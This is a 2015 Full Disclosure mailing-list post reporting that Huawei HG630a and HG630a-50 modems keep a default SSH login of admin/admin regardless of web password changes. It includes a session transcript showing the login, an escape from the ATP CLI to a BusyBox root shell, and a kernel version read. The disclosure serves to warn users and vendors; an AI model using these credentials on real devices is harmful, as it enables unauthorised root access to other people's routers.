
Date: Tue, 10 Nov 2015 11:36:50 +0200
From: Murat Sahin <mrtshn1@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Huawei HG630a and HG630a-50 Modems Default SSH Admin Password

Hi,

Adsl modems usually force you to change admin web interface password. Even
though you can change admin password on the web interface,  the password
you assign does not apply to ssh. So, SSH password always will be
'Username:admin Password:admin'.

Ex:

*ssh admin@...emIP <admin@....168.1.1>*
admin@...emIP <admin@....168.1.1>'s password:*admin*
PTY allocation request failed on channel 0
------------------------------
-
-----Welcome to ATP Cli------
-------------------------------
ATP>?
?
cls
debug
help
save
?
exit
ATP>shell
shell


BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /proc/version
cat /proc/version
Linux version 2.6.30 (y00179387@...alhost) (gcc version 4.4.2
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
#

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
